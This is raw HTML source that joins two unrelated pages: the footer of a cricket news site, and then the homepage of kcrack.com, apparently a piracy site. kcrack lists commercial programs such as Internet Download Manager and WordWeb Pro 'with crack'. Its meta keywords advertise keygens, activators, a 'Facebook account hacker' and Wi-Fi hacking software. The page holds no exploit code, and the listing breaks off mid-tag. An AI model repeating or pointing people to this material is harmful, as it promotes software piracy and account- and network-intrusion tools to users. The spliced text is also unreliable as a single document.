last"> </div> <div class="copyrights"> <!--start copyrights--> <div class="row" id="copyright-note"> <span><a href="https://www.mobilecric.com/" title="Your ultimate source to cricket news" rel="nofollow">Mobilecric.Com</a> Copyright &copy; 2019.</span> <div class="top"></div> <div class="top"><a href="https://www.mobilecric.com/contact-us/">Contact us</a></div> </div> <!--end copyrights--> </div> </div><!--.footer-widgets--> </div><!--.container--> </footer><!--footer--> </div><!--.main-container--> <!-- <script async="async" data-cfasync="false" src="//tharbadir.com/2?z=2518107"></script> --> <script type="text/javascript">   window._taboola = window._taboola || [];   _taboola.push({flush: true}); </script> <script type='text/javascript' src='https://www.mobilecric.com/wp-content/plugins/videojs-html5-player/videojs/video.min.js?ver=1.1.3'></script> <script type='text/javascript' src='https://www.mobilecric.com/wp-includes/js/wp-embed.min.js?ver=5.2'></script> </body> </html>
0
<!doctype html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <meta property="article:publisher" content="https://www.facebook.com/SadeemWorld" /> <meta property="article:author" content="https://www.facebook.com/SadeemServices" /> <meta name="ahrefs-site-verification" content="6e9b464c8413fca47da1238bd4ba79f8b08b40026c54064242d7a2885cfa4c26"> <meta name="yandex-verification" content="0433127259b8f190" /> <title>kCrack.com - Download Latest PC Software</title> <meta name="description" content="Download Latest Cracked Software Games With Patch Keygen Crack Full Version Free Download, Sadeem PC, SadeemPC, IDM Crack" /> <meta name="keywords" content="SadeemPC, Sadeem PC, sadeempc.com, SadeemPC IDM, Crack For IDM, Free Download Pc Software, Games, Free Download PC Games, Softwares With Crack And Patch Serial Key Full Version Games, Latest Full PC Games, Highly Compressed Games, Rip PC Games, FREE DOWNLOAD CRACK SOFTWARES, DOWNLOAD REGISTERED SOFTWARES, DOWNLOAD FREE FULL VERSION PC GAMES, DATA RECOUVERY, REGISTERED IDM, GRAPHICS DOWNLOAD, RACING GAMES, WINDOWS ACTIVATOR, www.TricksHOME.com, TricksHOME.com, TricksHOME, Seo Marketing, PC Games Free Download, PC Softwares Free Download, IDM Free Download, FREE DOWNLOAD SOFTWARE ACTIVATOR GAMES FREE DOWNLOAD REGISTRATIONWINDOW ANTIVIRUS IDM MULTIMEDIA WIFI CRACKING LATEST VERSION REGISTERED SOFTWARES LATEST FULL VERSION PORTABLE PHOTO EDITING TOOLS WITH SERIAL KEY, PATCH, CRACK, KEYGEN, LICENSE, , CODE,ACTION GAMES,,GAMES FREE DOWNLOAD,FACEBOOK ACCOUNT HACKER,BACKTRACK5,SEO TOOLS,SEO TIPS,SEO SOFTWARES,GIRLS GAMES,HORROR GAMES,WIFI HACK SOFTWARES,MOBILES GAMES,MOBILE SOFTWARES, Windows 8.1 Crack, Office 2015 Crack, NERO 2015 Platinum Crack, Hacking, Keygens, Patch, Crack, Free download, Software, How to Hack, Cracked software, Connectify 9 Crack, Connectify 9 Patch,IDM Crack, Action! Crack, COC Mods, CoC Hacks, Xmodgames, Get Cracks, Serial Keys, Patches, Activators, Keygens, For Any Pc Software Without Surveys, Download Free Latest Cracked Softwares, Serial Keys, Keygens, Cracks, Activators, Hacks, Licence Codes, Registered Softwares, Serial Numbers, Full Version Pc Softwares" /> <meta name="google-site-verification" content="fOSjgPOFyeFQeHR1P2d77FzhBEICEbAav7I7U5o8Mvo" /> <meta name="msvalidate.01" content="B7A4B75C9CD2A4DBCAE11ECE247E4AE9" /> <script type="application/ld+json"> { "@context": "http://schema.org", "@type": "WebSite", "potentialAction": { "@type": "SearchAction", "target": "https://kcrack.com/?s={search_term}", "query-input": "required name=search_term" }, "url": "https://kcrack.com/" } </script> <link rel='next' href='https://kcrack.com/page/2/' /> <link rel="canonical" href="https://kcrack.com/" /> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//secure.gravatar.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="kCrack.com - Download Latest PC Software &raquo; Feed" href="https://kcrack.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="kCrack.com - Download Latest PC Software &raquo; Comments Feed" href="https://kcrack.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/kcrack.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://c0.wp.com/c/5.2/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://kcrack.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='https://kcrack.com/wp-content/plugins/smooth-scroll-up/css/font-awesome.min.css?ver=4.6.3' type='text/css' media='all' /> <link rel='stylesheet' id='scrollup-css-css' href='https://kcrack.com/wp-content/plugins/smooth-scroll-up/css/scrollup.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='wp-postratings-css' href='https://kcrack.com/wp-content/plugins/wp-postratings/css/postratings-css.css?ver=1.86.2' type='text/css' media='all' /> <link rel='stylesheet' id='stylo-bootstrap-css' href='https://kcrack.com/wp-content/themes/getinmac/bootstrap/css/bootstrap.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='stylo-style-css' href='https://kcrack.com/wp-content/themes/getinmac/style.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='stylo-font-awesome-css' href='https://kcrack.com/wp-content/themes/getinmac/css/font-awesome/css/font-awesome.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_facebook_likebox-css' href='https://c0.wp.com/p/jetpack/7.3/modules/widgets/facebook-likebox/style.css' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='https://c0.wp.com/p/jetpack/7.3/css/jetpack.css' type='text/css' media='all' /> <script type='text/javascript' src='https://kcrack.com/wp-content/themes/getinmac/js/jquery.js?ver=5.2'></script> <link rel='https://api.w.org/' href='https://kcrack.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://kcrack.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://kcrack.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <link rel='shortlink' href='https://wp.me/9CHLD' /> <link rel='dns-prefetch' href='//v0.wordpress.com' /> <link rel='dns-prefetch' href='//i0.wp.com' /> <link rel='dns-prefetch' href='//i1.wp.com' /> <link rel='dns-prefetch' href='//i2.wp.com' /> <link rel='dns-prefetch' href='//jetpack.wordpress.com' /> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//s1.wp.com' /> <link rel='dns-prefetch' href='//s2.wp.com' /> <link rel='dns-prefetch' href='//public-api.wordpress.com' /> <link rel='dns-prefetch' href='//0.gravatar.com' /> <link rel='dns-prefetch' href='//1.gravatar.com' /> <link rel='dns-prefetch' href='//2.gravatar.com' /> <link rel='dns-prefetch' href='//c0.wp.com' /> <style type='text/css'>img#wpstats{display:none}</style> <meta property="og:type" content="website" /> <meta property="og:title" content="kCrack.com - Download Latest PC Software" /> <meta property="og:description" content="Download Latest Cracked Software Games With Patch Keygen Crack Full Version Free Download, Sadeem PC, SadeemPC, IDM Crack" /> <meta property="og:url" content="https://kcrack.com/" /> <meta property="og:site_name" content="kCrack.com - Download Latest PC Software" /> <meta property="og:image" content="https://i2.wp.com/kcrack.com/wp-content/uploads/2018/02/fico.png?fit=275%2C265&amp;ssl=1" /> <meta property="og:image:width" content="275" /> <meta property="og:image:height" content="265" /> <meta property="og:locale" content="en_US" /> <meta name="twitter:site" content="@SadeemServices" /> <link rel="icon" href="https://i2.wp.com/kcrack.com/wp-content/uploads/2018/02/fico.png?fit=32%2C32&#038;ssl=1" sizes="32x32" /> <link rel="icon" href="https://i2.wp.com/kcrack.com/wp-content/uploads/2018/02/fico.png?fit=192%2C185&#038;ssl=1" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://i2.wp.com/kcrack.com/wp-content/uploads/2018/02/fico.png?fit=180%2C173&#038;ssl=1" /> <meta name="msapplication-TileImage" content="https://i2.wp.com/kcrack.com/wp-content/uploads/2018/02/fico.png?fit=270%2C260&#038;ssl=1" /> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-115630184-1', 'auto'); ga('send', 'pageview'); </script> <style type="text/css" id="wp-custom-css"> .download_btn_new { color: #23a86d; padding: 10px; display: inline-block;; background: transparent; border-radius: 30px; text-decoration: underline; border: 1px solid #23a86d; font-size: 16px; transition: 0.5s all; font-weight: 500; width: 358px; height: 46px; text-align: left; } .download_btn_new:hover{ text-decoration: underline; color: #f60; border: 1px solid #23a86d; } .download_btn_new:focus{ outline: 1px; border: 1px solid #23a86d; } .download_btn_new:active{ border: 1px solid #23a86d; } .download_btn_new span { display: inline-block; margin-right: 10px; } .download_btn_new span:last-child { text-decoration: underline; } .download_btn_new span:first-child { color: #23a86d !important; } </style> </head> <body class="home blog wp-custom-logo hfeed"> <div id="page" class="site container"> <a class="skip-link screen-reader-text" href="#content">Skip to content</a> <header id="masthead" class="site-header"> <div class="site-branding row ml-0 mr-0"> <div class="logo pull-left"> <a href="https://kcrack.com/" class="custom-logo-link" rel="home"><img width="237" height="63" src="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/02/kcrack-logo-1.png?fit=237%2C63&amp;ssl=1" class="custom-logo" alt="kCrack.com &#8211; Download Latest PC Software" data-attachment-id="43" data-permalink="https://kcrack.com/kcrack-logo-2/" data-orig-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/02/kcrack-logo-1.png?fit=237%2C63&amp;ssl=1" data-orig-size="237,63" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="kcrack logo" data-image-description="" data-medium-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/02/kcrack-logo-1.png?fit=237%2C63&amp;ssl=1" data-large-file="https://i1.wp.com/kcrack.com/wp-content/uploads/2018/02/kcrack-logo-1.png?fit=237%2C63&amp;ssl=1" /></a> </div> <div class="header-links pull-right"> <a href="https://kcrack.com/feed/" class="rss-btn"><span>RSS</span><i class="fa fa-rss"></i></a> <a href="https://kcrack.com/donate/" class="donate-btn"><span>Donate</span><i class="fa fa-heart"></i></a> </div> </div> <nav id="site-navigation" class="main-navigation row ml-0 mr-0"> <button class="menu-toggle" aria-controls="primary-menu" aria-expanded="false"><i class="fa fa-bars"></i></button> <div class="menu-top-menu-container"><ul id="primary-menu" class="menu"><li id="menu-item-40" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-40"><a href="https://kcrack.com/" aria-current="page">Home</a></li> <li id="menu-item-39" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-39"><a href="https://kcrack.com/about/">About</a></li> <li id="menu-item-111" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-111"><a href="https://kcrack.com/category/featured-software/">Featured Software</a></li> <li id="menu-item-42" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-42"><a href="https://kcrack.com/category/software/">PC Software</a> <ul class="sub-menu"> <li id="menu-item-115" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-115"><a href="https://kcrack.com/category/pc-laptop-drivers/">PC &#038; Laptop Drivers</a></li> </ul> </li> <li id="menu-item-41" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41"><a href="https://kcrack.com/category/download-manager/">Download Manager</a></li> <li id="menu-item-112" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-112"><a href="https://kcrack.com/category/multimedia/">Multimedia</a> <ul class="sub-menu"> <li id="menu-item-113" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-113"><a href="https://kcrack.com/category/multimedia/audio-editing-software/">Audio Editing Software</a></li> <li id="menu-item-114" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-114"><a href="https://kcrack.com/category/multimedia/video-editing-software/">Video Editing Software</a></li> </ul> </li> <li id="menu-item-109" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-109"><a href="https://kcrack.com/category/converters/">Converters</a> <ul class="sub-menu"> <li id="menu-item-110" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-110"><a href="https://kcrack.com/category/converters/video-converters/">Video Converters</a></li> </ul> </li> </ul></div> </nav> <div class="search-row row mt-10 mb-10 ml-0 mr-0"> <div class="header-follow-links pull-left"><section id="text-2" class="widget widget_text"> <div class="textwidget"><p><strong>Follow kCrack:</strong> <a href="https://www.facebook.com/SadeemWorld" target="_blank" rel="noopener noreferrer">Facebook</a> / <a href="https://plus.google.com/u/0/+SadeemPc/" target="_blank" rel="noopener noreferrer">Google+</a> / <a href="https://www.pinterest.com/TricksHOME/" target="_blank" rel="noopener noreferrer">Pinterest</a> / <a href="https://kcrackposts.tumblr.com/" target="_blank" rel="noopener noreferrer">Tumblr</a></p> </div> </section></div> <div class="header-search pull-right"> <form action="https://www.google.com/cse" id="cse-search-box" target="_blank" class="searchform clearfix"> <input type="hidden" name="cx" value="006788341330474779479:jyg_itlyagy"> <input type="hidden" name="ie" value="UTF-8"> <span class="s"><input type="text" name="q" size="35"></span> <span class="searchsubmit"><button type="submit"></button></span> </form></div> </div> <div class="links-row row ml-0 mr-0"> <div class="menu-top-apps-container"><ul id="top-apps-menu" class="menu"><li id="menu-item-121" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-121"><a href="https://kcrack.com/idm-crack/">IDM 6.32 Build 11</a></li> <li id="menu-item-118" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-118"><a href="https://kcrack.com/iobit-uninstaller-pro-full-crack/">IObit Uninstaller Pro 8.4.0.8</a></li> <li id="menu-item-119" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-119"><a href="https://kcrack.com/keepvid-pro-crack/">KeepVid Pro 7.1.2.1</a></li> <li id="menu-item-155" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-155"><a href="https://kcrack.com/folder-lock-crack/">Folder Lock 7.7.4</a></li> <li id="menu-item-116" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-116"><a href="https://kcrack.com/hitfilm-pro-crack/">HitFilm Pro 8.0</a></li> <li id="menu-item-120" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-120"><a href="https://kcrack.com/wondershare-filmora-crack/">Wondershare Filmora 8.7</a></li> <li id="menu-item-154" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-154"><a href="https://kcrack.com/techsmith-camtasia-studio-full-version-cracked/">Camtasia Studio 2018</a></li> <li id="menu-item-1004" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-1004"><a href="https://kcrack.com/winrar-crack/">WinRAR 5.71</a></li> </ul></div> </div> <div class="tag-count-row ml-0 mr-0 mb-10"> <span class="tag-count-label pt-5 pr-5 pb-5 pl-5">Tags</span> <a href="https://kcrack.com/topics"> <span class="tag-count pt-5 pr-10 pb-5 pl-10">3832</span> </a> </div> </header> <div id="content" class="site-content"> <div class="header-banner mt-10 row ml-0 mr-0"> </div> <div id="primary" class="content-area mt-20"> <div id="main" class="site-main col-lg-9 col-md-8 col-sm-7 col-xs-12 pl-0"> <div class="post-row row ml-0 mr-0"> <div class="post-thumb pl-0 col-lg-2 col-md-2 col-sm-3 col-xs-3"> <a href="https://kcrack.com/idm-crack/"> <img width="150" height="150" src="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/03/Internet-Download-Manager-crack.png?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Internet Download Manager crack" srcset="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/03/Internet-Download-Manager-crack.png?resize=150%2C150&amp;ssl=1 150w, https://i2.wp.com/kcrack.com/wp-content/uploads/2019/03/Internet-Download-Manager-crack.png?zoom=2&amp;resize=150%2C150&amp;ssl=1 300w" sizes="(max-width: 150px) 100vw, 150px" data-attachment-id="2840" data-permalink="https://kcrack.com/idm-crack/internet-download-manager-crack/" data-orig-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/03/Internet-Download-Manager-crack.png?fit=362%2C472&amp;ssl=1" data-orig-size="362,472" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Internet Download Manager crack" data-image-description="" data-medium-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/03/Internet-Download-Manager-crack.png?fit=230%2C300&amp;ssl=1" data-large-file="https://i2.wp.com/kcrack.com/wp-content/uploads/2019/03/Internet-Download-Manager-crack.png?fit=362%2C472&amp;ssl=1" /> </a> </div> <div align="right"><div id="post-ratings-52" class="post-ratings" data-nonce="2f3806c904"><img id="rating_52_1" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_on.gif" alt="1 Star" title="1 Star" onmouseover="current_rating(52, 1, '1 Star');" onmouseout="ratings_off(4.2, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_52_2" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_on.gif" alt="2 Stars" title="2 Stars" onmouseover="current_rating(52, 2, '2 Stars');" onmouseout="ratings_off(4.2, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_52_3" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_on.gif" alt="3 Stars" title="3 Stars" onmouseover="current_rating(52, 3, '3 Stars');" onmouseout="ratings_off(4.2, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_52_4" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_on.gif" alt="4 Stars" title="4 Stars" onmouseover="current_rating(52, 4, '4 Stars');" onmouseout="ratings_off(4.2, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_52_5" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="5 Stars" title="5 Stars" onmouseover="current_rating(52, 5, '5 Stars');" onmouseout="ratings_off(4.2, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /> <span style="color: #23a86d">(<strong>88</strong>) votes</span></div><div id="post-ratings-52-loading" class="post-ratings-loading"> <img src="https://kcrack.com/wp-content/plugins/wp-postratings/images/loading.gif" width="16" height="16" class="post-ratings-image" />Loading...</div></div> <div class="post-detail col-lg-10 col-md-10 col-sm-9 hidden-xs pr-0 pl-0"> <div class="post-title-row row ml-0 mr-0"> <a href="https://kcrack.com/idm-crack/">Internet Download Manager 6.33 Build 2 Crack ! [No Patch]</a> </div> <div class="post-desc-row mt-10 row ml-0 mr-0"> Rate This Post: (88) votes Loading...Internet Download Manager (IDM) Crack is a reliable and very useful tool with safe multipart downloading technology to accelerate from internet your downloads such a video, music, games, documents and other important stuff for your files. IDM Crack has a smart d... </div> <div class="post-meta-row mt-20 row ml-0 mr-0"> <div class="pull-left"> <span class="posted-date"><span class="posted-on"> <a href="https://kcrack.com/idm-crack/" rel="bookmark"><time class="entry-date published" datetime="2019-05-16T12:49:11+00:00">May 16, 2019</time><time class="updated" datetime="2019-05-16T12:50:40+00:00">May 16, 2019</time></a></span></span> </div> <div class="pull-right"> <span class="categories"><span class="cat-links"> <a class="tag-11" href="https://kcrack.com/category/download-manager/" title="View all posts in Download Manager" rel="category tag">Download Manager</a> <a class="tag-11" href="https://kcrack.com/category/featured-software/" title="View all posts in Featured Software" rel="category tag">Featured Software</a></span> </div> </div> </div> <div class="post-detail hidden-lg hidden-md hidden-sm col-xs-9"> <div class="post-title-row row ml-0 mr-0"> <a href="https://kcrack.com/idm-crack/">Internet Download Manager 6.33 Build 2 Crack ! [No Patch]</a> </div> </div> <div class="post-detail hidden-lg hidden-md hidden-sm col-xs-12 mb-20 pr-0 pl-0"> <div class="post-desc-row mt-10 row ml-0 mr-0"> Internet Download Manager (IDM) Crack is a reliable and very useful tool with safe multipart downloading technology to accelerate from internet your downloads ... </div> <div class="post-meta-row mt-20 row ml-0 mr-0"> <div class="pull-left"> <span class="posted-date"><span class="posted-on"> <a href="https://kcrack.com/idm-crack/" rel="bookmark"><time class="entry-date published" datetime="2019-05-16T12:49:11+00:00">May 16, 2019</time><time class="updated" datetime="2019-05-16T12:50:40+00:00">May 16, 2019</time></a></span></span> </div> <div class="pull-right"> <span class="categories"><span class="cat-links"> <a class="tag-10" href="https://kcrack.com/category/download-manager/" title="View all posts in Download Manager" rel="category tag">Download Manager</a> <a class="tag-12" href="https://kcrack.com/category/featured-software/" title="View all posts in Featured Software" rel="category tag">Featured Software</a></span> </div> </div> </div> </div> <div class="post-row row ml-0 mr-0"> <div class="post-thumb pl-0 col-lg-2 col-md-2 col-sm-3 col-xs-3"> <a href="https://kcrack.com/wordweb-pro-ultimate-reference-bundle-crack/"> <img width="150" height="150" src="https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/WordWeb-Pro-Ultimate-Reference-Bundle-Crack.jpg?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image" alt="WordWeb Pro Ultimate Reference Bundle Crack" srcset="https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/WordWeb-Pro-Ultimate-Reference-Bundle-Crack.jpg?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/WordWeb-Pro-Ultimate-Reference-Bundle-Crack.jpg?zoom=2&amp;resize=150%2C150&amp;ssl=1 300w" sizes="(max-width: 150px) 100vw, 150px" data-attachment-id="3222" data-permalink="https://kcrack.com/wordweb-pro-ultimate-reference-bundle-crack/wordweb-pro-ultimate-reference-bundle-crack/" data-orig-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/WordWeb-Pro-Ultimate-Reference-Bundle-Crack.jpg?fit=314%2C350&amp;ssl=1" data-orig-size="314,350" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="WordWeb Pro Ultimate Reference Bundle Crack" data-image-description="" data-medium-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/WordWeb-Pro-Ultimate-Reference-Bundle-Crack.jpg?fit=269%2C300&amp;ssl=1" data-large-file="https://i0.wp.com/kcrack.com/wp-content/uploads/2019/05/WordWeb-Pro-Ultimate-Reference-Bundle-Crack.jpg?fit=314%2C350&amp;ssl=1" /> </a> </div> <div align="right"><div id="post-ratings-3221" class="post-ratings" data-nonce="9bce05aaa3"><img id="rating_3221_1" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="1 Star" title="1 Star" onmouseover="current_rating(3221, 1, '1 Star');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_3221_2" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="2 Stars" title="2 Stars" onmouseover="current_rating(3221, 2, '2 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_3221_3" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="3 Stars" title="3 Stars" onmouseover="current_rating(3221, 3, '3 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_3221_4" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="4 Stars" title="4 Stars" onmouseover="current_rating(3221, 4, '4 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_3221_5" src="https://kcrack.com/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="5 Stars" title="5 Stars" onmouseover="current_rating(3221, 5, '5 Stars');" onmouseout="ratings_off(0, 0, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /> (No Ratings Yet)<br /><span class="post-ratings-text" id="ratings_3221_text"></span></div><div id="post-ratings-3221-loading" class="post-ratings-loading"> <img src="https://kcrack.com/wp-content/plugins/wp-postratings/images/loading.gif" width="16" height="16" class="post-ratings-image" />Loading...</div></div> <div class="post-detail col-lg-10 col-md-10 col-sm-9 hidden-xs pr-0 pl-0"> <div class="post-title-row row ml-0 mr-0"> <a href="https://kcrack.com/wordweb-pro-ultimate-reference-bundle-crack/">WordWeb Pro Ultimate Reference Bundle 8.24 With Crack</a> </div> <div class="post-desc-row mt-10 row ml-0 mr-0"> WordWeb Pro Ultimate Reference Bundle Crack can look up words in virtually any program with just one click: just hold down the Ctrl key and right-click on the word. If you are online, with one extra click you can also search web references, for example Wikipedia. The hotkey can be customized, or you... </div> <div class="post-meta-row mt-20 row ml-0 mr-0"> <div class="pull-left"> <span class="posted-date"><span class="posted-on"> <a href="https://kcrack.com/wordweb-pro-ultimate-reference-bundle-crack/" rel="bookmark"><time class="entry-date published" datetime="2019-05-16T13:27:25+00:00">May 16, 2019</time><time class="updated" datetime="2019-05-16T13:28:17+00:00">May 16, 2019</time></a></span></span> </div> <div class="pull-right"> <span class="categories"><span class="cat-links"> <a class="tag-3" href="https://kcrack.com/category/document-tools/" title="View all posts in Document Tools" rel="category tag">Document Tools</a> <a class="tag-1" href="https://kcrack.com/category/office/" title="View all posts in Office" rel="category tag">Office</a> <a class="tag-9" href="https://kcrack.com/category/software/" title="View all posts in PC Software" rel="category tag">PC 